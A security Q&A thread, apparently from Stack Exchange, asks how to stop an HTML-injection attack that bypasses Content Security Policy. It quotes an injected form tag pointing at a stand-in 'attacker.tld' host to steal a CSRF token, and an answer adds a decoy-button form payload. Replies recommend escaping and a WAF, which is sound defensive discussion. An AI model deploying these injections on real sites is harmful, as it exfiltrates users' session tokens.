# Bypass Content Security Policy: Using Form tag

Tags: xss, validation, content-security-policy

This [article](https://labs.detectify.com/2016/04/04/csp-bypassing-form-action-with-reflected-xss/) talks about bypassing CSP using Form tags.

Edit: As suggested, details has to be provided in case the external link stops working.

So here are the details:

There is content-security-policy in place and a vulnerable parameter to XSS:

```
Content-Security-Policy: default-src ‘none’; 

<html>

<body>

<div>[Reflected XSS vulnerability here]</div>

<form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”>

<input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” />

<input type=”submit” value=”Subscribe to newsletter” />

</form>

</body>

</html>
```

This is how the author tries to bypass CSP:

```
Content-Security-Policy: default-src ‘none’; 

<html>

<body>

<div><form action=”http://attacker.tld”></div>

<form method=”POST” id=”subscribe” action=”/api/v1/newsletter/subscribe”>

<input type=”hidden” name=”csrftoken” value=”5f4dcc3b5aa765d61d8327deb882cf99” />

<input type=”submit” value=”Subscribe to newsletter” />

</form>

</body>

</html>
```

I want to know is there a way CSP should be implemented to stop the above attack and circumvent the sensitive tokens to be sent to external domain?
Or proper encoding of special characters has to be done to stop this.

Comment: I am sorry but I don't understand the question at all. You said there is XSS. Then you said scripts can't be executed. So how this can be XSS? Also, I don't understand how you forced to push another <form> field to HTML... Can you please elaborate on this?

Comment: Btw. how is the form submitted? Are you sure your injected form is submitted?

Comment: @Fis can you check again? I rephrased it. Is it making it clear?

Comment: Yes :) Got it now. How do you submit the form? Is there any button? Or how is it submitted?

Comment: @Fis , I believe that was ambiguous from my side and it is better to keep it simple. So I am just referring to the article shared and want to know how to stop this bypass methodology?

Comment: Let's say that the linked page changes; then all of a sudden, the question is potentially meaningless. *Necessary details go into the post, not on external sites.* That goes for questions and answers alike.

Comment: The CSP is not the solution here. It's proper output escaping.

Answer (score 3):

Question changed in between :)

<s>In this case is not clear how you submit the malicious form. In order t get it work you have to inject something like:</s>

```
<form method="post" target="abc"><form method="post" target="evil"><input type="submit" value="Click me to win new iPhone" />
<input type="hidden" name="..." value="...">.....
```

and make the user click the button somehow (as there is no option to submit automatically). I can also see possibility to hide original button using the CSS and replacing it with your button.

You asking how to protect against this. I can see two options:

1. fix the server code to properly validate / escape user input
2. place the application firewall in front of the web server and filter out all injections there

In both cases I would say replacing (escaping) of < with &lt; and > with &gt; for all input parameters would work in such case.

as @Arminius correctly said there is no way how to configure CSP against this.

Comment: Not sure why the downvote. As correctly stated - this is HTML injection, not script injection. CSP is not correct here. I would recommend actually doing both recommended options (proper escaping + WAF).
Another option would be removing the reflection completely, if it's not necessary. One case where I've seen this is in field validation error messages - no need to reflect the supplied value in the message.

Comment: I would say the downvote was because the question has changed at least 3 times and before I was able to update my answer sbdy downvoted.